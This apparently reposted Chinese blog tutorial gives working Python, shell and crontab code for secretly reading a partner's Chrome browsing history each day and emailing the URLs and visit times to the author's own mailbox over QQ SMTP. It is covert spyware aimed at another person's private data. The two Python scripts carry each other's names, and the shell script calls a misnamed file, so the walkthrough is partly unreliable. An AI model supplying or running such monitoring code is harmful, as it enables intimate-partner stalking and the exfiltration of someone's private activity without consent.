python监控网页变化教程_Python实时监控网站浏览记录实现过程详解

python监控网页变化教程_Python实时监控网站浏览记录实现过程详解需求:(1)获取你对象chrome前一天的浏览记录中的所有网址(url)和访问时间,并存在一个txt文件中(2)将这个txt文件发送给指定的邮箱地址(你的邮箱)(3)建立例行任务,每天定时自动完成这些操作,你就可以通过邮件查看你对象每天看啥了准备macOSSierraPython3.6Chrome发送邮件的qq邮箱地址qq邮箱授权码SMTP服务器地址:smtp.qq.com接受邮件的邮箱地…

大家好,又见面了,我是你们的朋友全栈君。

需求:

(1) 获取你对象chrome前一天的浏览记录中的所有网址(url)和访问时间,并存在一个txt文件中

(2)将这个txt文件发送给指定的邮箱地址(你的邮箱)

(3)建立例行任务,每天定时自动完成这些操作,你就可以通过邮件查看你对象每天看啥了

准备

macOS Sierra

Python3.6

Chrome

发送邮件的qq邮箱地址

qq邮箱授权码

SMTP服务器地址 : smtp.qq.com

接受邮件的邮箱地址

执行:

(1) 首先我们用DB Browser for SQLite来看下History中的urls表的数据组成

从表中可以看出,我们要的网址和访问时间就在urls.url和urls.last_visit_time中

python监控网页变化教程_Python实时监控网站浏览记录实现过程详解

(2) get_history.py:

# -*- coding: utf-8 -*-

from email import encoders

from email.header import Header

from email.mime.text import MIMEText

from email.mime.multipart import MIMEMultipart

from email.mime.base import MIMEBase

from email.utils import parseaddr, formataddr

import smtplib

import argparse

# 1.文件执行的需要的参数(result.txt)

parser = argparse.ArgumentParser()

parser.add_argument(‘affix_file’,help=’the path of the affix’)

args = parser.parse_args()

# 2.格式化一个邮件地址和邮件信息

def _format_addr(s):

name, addr = parseaddr(s)

return formataddr((Header(name, ‘utf-8’).encode(), addr))

#连接服务器(这里大家好改成自己的!)

from_addr = “771568102@qq.com” #发件人邮箱

password = “xxxxxxxx” #发件人邮箱授权码

to_addr = “2160802033@cnu.edu.cn” #收件人邮箱

smtp_server = “smtp.qq.com” #SMTP服务器地址

#邮件发件人名字、收件人名字、主题

msg = MIMEMultipart()

msg[‘From’] = _format_addr(‘风一样的女子 ‘ % from_addr)

msg[‘To’] = _format_addr(‘风一样的男子 ‘ % to_addr)

msg[‘Subject’] = Header(‘chrome历史记录每日更新’, ‘utf-8’).encode()

# 邮件正文是MIMEText:

msg.attach(MIMEText(‘窥探隐私是犯法的啊!’, ‘plain’, ‘utf-8’))

# 添加附件就是加上一个MIMEBase,从本地读取一个txt文件:

with open(args.affix_file, ‘r’) as f:

# 设置附件的MIME和文件名,这里是py类型:

mime = MIMEBase(‘result’, ‘txt’, filename=’result.txt’)

# 加上必要的头信息:

mime.add_header(‘Content-Disposition’, ‘attachment’, filename=’result.txt’)

mime.add_header(‘Content-ID’, ‘<0>’)

mime.add_header(‘X-Attachment-Id’, ‘0’)

# 把附件的内容读进来:

mime.set_payload(f.read())

# 用Base64编码:

encoders.encode_base64(mime)

# 添加到MIMEMultipart:

msg.attach(mime)

#3.通过SMTP发送出去

server = smtplib.SMTP(smtp_server, 25)

server.set_debuglevel(1)

server.login(from_addr, password)

server.sendmail(from_addr, [to_addr], msg.as_string())

server.quit()

通过这个脚本,我们可以把url和访问时间提取出来,并且存储在

result.txt中,下图就是我得到的部分结果

python监控网页变化教程_Python实时监控网站浏览记录实现过程详解

(3) send_email.py:

# -*- coding: utf-8 -*-

import sqlite3

#大家要改成自己的路径

history_db = ‘/Users/Marcel/Desktop/tmp/code/chrome_history/History’

# 1.连接history_db

c = sqlite3.connect(history_db)

cursor = c.cursor()

# 2.选取我们想要的网址和访问时间

try:

select_statement = “SELECT url,datetime(last_visit_time/1000000-11644473600,’unixepoch’,’localtime’) AS tm FROM urls WHERE julianday(‘now’) – julianday(tm) < 1 ORDER BY tm;”

cursor.execute(select_statement)

except sqlite3.OperationalError:

print(“[!] The database is locked! Please exit Chrome and run the script again.”)

quit()

# 3.将网址和访问时间存入result.txt文件

results = cursor.fetchall()

with open(‘/Users/Marcel/Desktop/tmp/code/chrome_history/result.txt’,’w’) as f:#改成自己的路径

for i in range(len(results)):

f.write(results[i][1]+’\n’)

f.write(results[i][0]+’\n’)

通过这个脚本,我们可以把result.txt作为附件,发送给指定邮箱地

址,下图是我得到的部分结果

python监控网页变化教程_Python实时监控网站浏览记录实现过程详解

(4) ./start.sh :其实,前面几个脚本,已经完成了我们的任务,但是每次都执行这么多脚

本,太麻烦了,我们可以把这些脚本的执行语句整理成一个shell脚本。

cp /Users/Marcel/Library/Application\ Support/Google/Chrome/Default/History /Users/Marcel/Desktop/tmp/code/chrome_history/

python /Users/Marcel/Desktop/tmp/code/chrome_history/get_history.py

python /Users/Marcel/Desktop/tmp/code/chrome_history/send_mail.py /Users/Marcel/Desktop/tmp/code/chrome_history/result.txt

这样,我们在终端执行./start.sh,系统就会帮我们把这三条语句依次执行了

注意:由于crontab命令需要绝对路径,所以这里的路径都是用绝对路径

(5) crontab :如果使用了这个命令,在电脑开机并且联网的情况,系统会自动执行,然后把结果发到你的邮箱

使用方法:在终端下输入crontab -e,使用vim输入下面一行代码就可以了

20 14 * * * /Users/Marcel/Desktop/tmp/code/chrome_history/start.sh

说明:前面两个数字,就是你每天执行这个脚本的时间,我这里设置的是14:20。

重要的事再说一遍,一定要写绝对路径!!

以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持python博客。

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

发布者:全栈程序员-用户IM,转载请注明出处:https://javaforall.cn/160597.html原文链接:https://javaforall.cn

【正版授权,激活自己账号】: Jetbrains全家桶Ide使用,1年售后保障,每天仅需1毛

【官方授权 正版激活】: 官方授权 正版激活 支持Jetbrains家族下所有IDE 使用个人JB账号...

(0)


相关推荐

  • linux 防火墙 命令_Linux高频命令汇总

    linux 防火墙 命令_Linux高频命令汇总原:https://blog.csdn.net/zhang123456456/article/details/781492061、firewalld的基本使用启动:systemctlstartfirewalld查看状态:systemctlstatusfirewalld停止:systemctldisablefirewalld禁用:systemctlstop…

  • visibilitychange – 指定标签页可见时,刷新页面数据

    visibilitychange – 指定标签页可见时,刷新页面数据三个知识点:一通过监听浏览器页面可见性改变(visibilitychange)事件,来判断标签页是否可见二配置路由的meta,来判断是否是指定的标签页三调用其它模块的actions,刷新数据router.jsroutes:[{path:”/”,redirect:”index”},{path:”/ind…

  • onedrive个人版免费扩容_onedrive会员

    onedrive个人版免费扩容_onedrive会员这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML图表FLowchart流程图导出与导入导出导入欢迎使用Markdown编辑器你好!这是你第一次使用Markdown编辑器所展示的欢迎页。如果你想学习如何使用Mar

  • linux 查看tomcat日志 关键字「建议收藏」

    linux 查看tomcat日志 关键字「建议收藏」转载:https://blog.csdn.net/u013410747/article/details/711921401catapp.log|grep‘error’2.查询日志尾部最后10行的日志tail-n10app.log3.查询10行之后的所有日志tail-n+10app.log4.查询日志文件中的头10行日志head-n1…

  • vue devtools使用教程_vue debug

    vue devtools使用教程_vue debug一般在utils文件夹下api.js文件里面写接口,接口环境判断varhref=window.location.href//两者都可以拿到当前运行URL链接//varhost=window.location.hostlet_ipcc_cst;const_sysServer=(/(creditcard.ecitic.com)/i.test(location.origin))?’https://creditcard.ecitic.com’:’https://e.test.ban

  • 光场相机可以计算光线的方向,也可以计算目标的深度_相机感光器在哪里

    光场相机可以计算光线的方向,也可以计算目标的深度_相机感光器在哪里博主最近在搞光场相机方面的研究啦,好了废话不多说,开始!1.一些前言废话首先,来一下光场的基本概念,来自百度百科。光场(lightfield):就是指光在每一个方向通过每一个点的光量。从概念里

发表回复

您的电子邮箱地址不会被公开。

关注全栈程序员社区公众号